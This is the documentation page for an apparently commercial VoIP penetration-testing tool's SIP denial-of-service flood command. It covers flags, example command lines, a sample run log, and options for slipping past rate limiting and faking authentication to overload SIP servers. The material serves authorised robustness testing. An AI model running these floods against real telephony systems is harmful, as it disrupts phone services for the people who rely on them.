sipvicious sip dos flood

Summary

SIP flood DoS attacks

What it does

Reproduce, detect and exploit the SIP INVITE flood attacks and other methods. This tool allows testers to check the robustness of the target SIP entities, allowing for various mutations of the attack, including rate limiting to bypass network security protection, default monitoring of the target system and various different behaviors for the SIP INVITE flood attack. The attack may be spread out across different SIP extensions or URIs, across different targets.

Tool functionality

The sip dos flood command sends SIP messages in large bulks to trigger denial of service conditions. In the case of most SIP messages, the functionality is rather simple: send large numbers of that particular SIP message as fast as possible, using as many connections as possible. In the case of INVITE messages, extra behaviour is implemented to trigger different conditions. A random user/extension is generated for each request sent by default.

A prober is switched on by default, which will send a SIP message that is known to elicit a response from the target system. This is used to monitor the system and tell if the system starts missing messages or stops responding at all. This is done by sending the same message that is used to initiate the SIP flood. The prober should record the response code so that if it later changes (e.g. from a 200 or 404 to a 5XX server error), it can report this change. If the prober starts missing responses, these get logged as a non-fatal error.

This functionality is the same as the individual tool accessible under sipvicious sip tools ping.

If registration is done using valid credentials, then an unregister should be sent at the end of the test.

The following is an example logging of the tool when run with the default settings:

INFO[2020-05-28 16:40:28] Starting sip dos flood on udp://demo.sipvicious.pro:5060 with method REGISTER
INFO[2020-05-28 16:40:29] prober for udp://demo.sipvicious.pro:5060 started
INFO[2020-05-28 16:40:30] prober response for udp://demo.sipvicious.pro:5060 received, checking for SIP/2.0 404 enumerate me baby
INFO[2020-05-28 16:40:31] 153546/s (62.3 MiB/s)
INFO[2020-05-28 16:40:32] 151662/s (61.6 MiB/s)
INFO[2020-05-28 16:40:33] 154512/s (62.9 MiB/s)
INFO[2020-05-28 16:40:34] 161444/s (65.7 MiB/s)

Command format

sipvicious sip dos flood <target1 [target2 [target3 ...]]> [flags]

Flags

      --auth-mode string      Specify how to handle authentication requests (fake|real|ignore); default: ignore unless the -u flag is present
      --close-conn            Close the connection after sending each message, instead of keeping it alive
  -c, --conn-count int        Number of sockets to use (per target) (default 30)
  -u, --credentials string    Set the username and password in the following format: username:password (e.g. 1000:test123)
  -d, --dictionary string     Specify a file containing extensions or SIP URIs to hit
  -D, --domain string         override domain name for the SIP address
      --duration duration     Set the duration of the attack
  -e, --extension string      Specify a target extension or SIP URI to hit; if not specified, random numeric extensions are used
  -f, --from string           specify a from extension or SIP URI to set the from address; if not specified, a random numeric extension is used
      --invite-mode strings   Specify how to behave during an INVITE flood; format: action or action:duration; (ignore|hangup-trying|hangup-ringing|hangup-call|never-hangup); default: ignore
      --max-requests int      Set the maximum number of requests to send
  -m, --method string         Set the method to flood the target with; (REGISTER|SUBSCRIBE|NOTIFY|PUBLISH|MESSAGE|INVITE|OPTIONS) (default "REGISTER")
      --no-prober             Do not monitor the system by sending ping messages to check for errors or timeouts (on by default)
      --nonce-reuse string    Choose between detecting nonce reuse capability, forcing nonce reuse or disabling nonce reuse. Defaults to automatic detection; (auto|force|disable) (default "auto")
      --rate string           Specify how many packets to send for each period of time; format: packets/duration; e.g. 100/30ms
      --register              Maintain a registration throughout the attack; requires -u
      --static-branch         Do not randomize the branch value
      --static-cseq           Do not increment CSeq numbers

Flags inherited from parent commands

      --ca-cert string       TLS CA Certificate
      --client-cert string   TLS client certificate
      --client-key string    TLS client private key
  -C, --config string        configuration file to use (may be JSON, TOML or YAML)
      --debug                set log level to debug
      --logfile string       specify a log filename
      --srtp string          specify if either none, dtls or sdes to enforce SRTP for calls; format: method or method:parameters; see full documentation for details (default "none")
      --templates string     Directory to search for template overrides (default ".")
      --tls-key-log string   TLS key log, - for stdout

Examples

sipvicious sip dos flood udp://target:5060 -e 10000
sipvicious sip dos flood tcp://target:5060 -c 80 --duration 15m --rate 100/10ms  -m INVITE
sipvicious sip dos flood tls://target:5060 -c 200 -u 1234:password --nonce-reuse disable \
	--register -m INVITE --invite-mode hangup-ringing:30s --invite-mode hangup-call
sipvicious sip dos flood udp://target1.5060 tcp://target1:5060 --auth-mode fake --nonce-reuse force

Advanced examples

# maintain a registration throughout the flood attack using the credentials given
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -u 1000:1500 --register -e 2000

# bypass network security rate limiting by slowing down and prolonging the attack
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -c 100 --duration 100m --rate 1/20ms -e 2000

# target several domains with different extensions limiting maximum requests
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 tcp://demo.sipvicious.pro:5060 tls://demo.sipvicious.pro:5060 -e 2000,3000,4000 --max-requests 1000

# using subscribe method and not incrementing cseq no. with no ping probes
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -e 2000 -m subscribe --static-cseq --no-prober

# flood using fake authentication handling and forcing nonce-reusing
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -e 2000 --auth-mode fake --nonce-reuse force

# flood using invite method with invite mode set to both call-hangups and hangup-ringing and also using 100 sockets, forcing a specific domain while maintaining a static branch number
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -m invite --static-branch --invite-mode hangup-call --invite-mode hangup-ringing:60s --conn-count 100 --domain siteonsip.tld -e 2000

# using a list of extensions to target and terminating connections after sending a message
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 --dictionary extensions.txt --close-conn

# prolong the flood attack using the never-hangup mode during an INVITE flood
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -u 1000:1500 --register -d ext.txt --invite-mode never-hangup -m invite

# using the publish method for the flood attack
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -e 2000 --nonce-reuse disable -m publish

Exit codes

This tool returns exit code 3, i.e. security issue is detected when the prober detects SIP-level or network-level errors. The tool returns exit code 3, i.e. network connectivity problems when the connection fails before the attack is started.

Flag: auth-mode

Specify how authentication requests are handled. This can be either fake, real or ignore. By default, authentication requests are ignored unless credentials are specified using the -u flag. When credentials are specified, the default behaviour is to make use of real credentials. When fake is specified, the challenge response is generated based on the challenge, but no credentials are actually used. This has the benefit of generating a failed authentication request, thus possibly triggering DoS at authentication stage, while requiring no extra calculations to be done from the attacker’s side.

Note: authentication may slow down the attack, thus the value ignore is desired when speed is needed.

Flag: ca-cert

The CA cert can be passed when making use of client certificate authentication. The file should be formatted as PEM.

Flag: client-cert

The client certificate must be passed when making use of client certificate authentication. The file should be formatted as PEM.

Flag: client-key

The client key must be passed when making use of client certificate authentication. The file should be formatted as PEM.

Flag: close-conn

The default connection behaviour is to try to keep all connections alive or, in the case of UDP, to reuse the same socket. This flag overrides this behaviour so that the connection is closed after each message is sent. This can uncover vulnerabilities related to socket handling in relation to SIP signalling.

Flag: config

Specify a configuration file which may be a JSON, TOML and YAML config format. To get the default settings and figure out which settings are available, one may run the sipvicious utils dump config command. This is typically used to create a template configuration that can then be edited as need be.

These settings may be overwritten when the corresponding flag is explicitly set, if one is present.

Flag: conn-count

The conn-count allows setting of how many sockets should be used concurrently to spread out of the attack.

Flag: credentials

Specify valid credentials so that SIP flooding can be done authenticated. The following format is used username:password (e.g. 1000:test123). When not specified, if required, the tool will send fake challenge responses.

Note: authentication may slow down the attack.

Flag: debug

Tells the logger to print out debug messages.

Flag: dictionary

Specify a file containing potential SIP extensions or SIP URIs to be used in the enumeration attack. This flag is useful when spreading a SIP INVITE flood attack across different targets behind a SIP proxy. Examples include:

1234
testuser
sip:testuser2@example.org

Note that although this may be used with other SIP methods, such as REGISTER with valid credentials, this may lead to unexpected behaviour from a SIP protocol point of view.

This flag may not be used with extension flag.

Flag: domain

A domain name can be specified so that the SIP URI contains that particular domain rather than the one specified as the target. This is useful for targets that expect a particular domain name.

Flag: duration

Specify the maximum duration of the attack so that it stops after a certain time.

Flag: extension

This flag allows users to target a particular extension, overriding the default behaviour of targeting random extensions. The value can be either just the SIP extension/username (e.g. 1234) or a SIP URI (e.g. sip:user@example.org).

This flag may not be used with dictionary flag.

Flag: from

This flag allows users to set the From address, overriding the default behaviour of setting a random extension or the username in the credentials when one is provided. The value can be either just the SIP extension/username (e.g. 1234) or a SIP URI (e.g. sip:user@example.org).

Flag: invite-mode

The flag invite-mode allows one to specify how to behave during an INVITE flood. The value of this flag could be one of the following actions:

  • ignore which does not wait for SIP INVITE responses; this is the default
  • hangup-trying which sends a CANCEL as soon as a 100 Trying message is received
  • hangup-ringing which sends a CANCEL as soon as a 180 Ringing is received
  • hangup-call which hangs up (by sending a BYE) when a call is picked up (i.e. when a 200 OK is received)
  • never-hangup which handles the call flow normally without hanging up

Additionally, the action value may be preceded by a colon and a duration value. This duration should be specified when the action should be taken after a specific time (e.g. 2s or 300ms). For example, hangup-ringing:300ms.

NOTE: The following invite-mode values cannot be combined with other invite-mode values:

  • ignore
  • never-hangup

Flag: logfile

When the logfile flag is specified, a log file is created in the location specified and logs are generated in this file instead of being sent to standard output. If the filename ends with a .json file extension, then the output format is in JSON, otherwise it defaults to text format.

Flag: max-requests

Specify the maximum number of messages to send before stopping the attack.

Flag: method

The SIP flood tool supports the following SIP methods:

  • REGISTER
  • SUBSCRIBE
  • NOTIFY
  • PUBLISH
  • MESSAGE
  • INVITE
  • OPTIONS

In the case of INVITE messages, the invite-mode method specifies extra parameters that are only specific to this method.

Flag: no-prober

Switches off the default prober which sends a SIP message to detect errors and issues during an attack.

Flag: nonce-reuse

If a server supports nonce reuse, an attack involving authentication may be sped up by supporting that functionality. This is done by sampling responses and looking for an authentication request if given the correct credentials using the -u flag. By default, the tool tries to make use of nonce-reuse if the target supports it. Nonce-reuse can be forced by passing the value of force or completely disabled by passing the value of disabled to the nonce-reuse flag.

Disabling nonce-reuse may be useful when trying to reproduce a DoS issue involving nonce generation.

Warning: disabling nonce-reuse slows down any attack.

Flag: rate

Rate allows one to limit the attack below a certain rate. If the value is 100/30ms, that means that 100 packets should be spread out evenly across 30 milliseconds across all the connections per target.

Flag: register

Register requires credentials to be passed so that a REGISTER message is sent to authenticate with a registrar server before starting the attack. The registration is maintained as per SIP standards, so that authentication does not time out.

Flag: srtp

The srtp flag when specified, allows users to set the SRTP mode. By default, outgoing calls do not make use of SRTP, while incoming calls automatically handle SRTP depending on the SDP body of the incoming INVITE message. When the srtp flag is set to none, incoming calls do not make use of SRTP, regardless of the SDP body in an incoming INVITE. The srtp mode can also be either dtls or sdes. In both dtls and sdes modes, the parameters are not required and will be generated randomly as need be.

Options for both dtls and sdes mode may be passed after a colon. For example:

  • TODO: --srtp dtls:cert.crt:cert.key[:ca.crt] where the first argument after the mode (dtls) is the public certificate cert.crt, then the private key cert.key and finally, the optional certificate authority file ca.crt
  • --srtp sdes:d0RmdmcmVCspeEc3QGZiNWpVLFJhQX1cfHAwJSoj where the argument is the base64 encoded cryptographic master key appended with the master salt.

Note that in the case of sdes key, the master key needs to be a valid length, which is 30 octets, for the default crypto-suite AES_CM_128_HMAC_SHA1_80.

Flag: static-branch

The static-branch flag may lead to DoS conditions that are not exhibited when using random or incremental values.

Flag: static-cseq

The static-cseq flag may lead to DoS conditions that are not exhibited when using random or incremental values.

Flag: templates

Allows one to set the template directory which is used to load (or save) the SIP templates.

To get the default SIP templates, make use of the sipvicious sip utils dump templates command.

Flag: tls-key-log

The TLS key log creates a file with the TLS key that can then be used to decrypt the TLS stream in tools that support it, such as Wireshark.

Future enhancements

Rate limit test

Testing of different rate limits would be useful to identify the ideal sending rate. A specific function could be present to find the right sending rate that is allowed by the target system. An extended feature would be to be able to automatically find that rate and then intelligently stay under it without any configuration of the tool.

Update Dictionary to support credentials

The current dictionary flag is useful for INVITE flood and perhaps some other methods but not so much for REGISTER flood, when credentials are provided, where it may only make sense to register to a specific account when credentials are specified.

Spread attack across different authenticated users

Functionality to support spreading the flooding across different users may be needed to bypass user specific checks or limitations.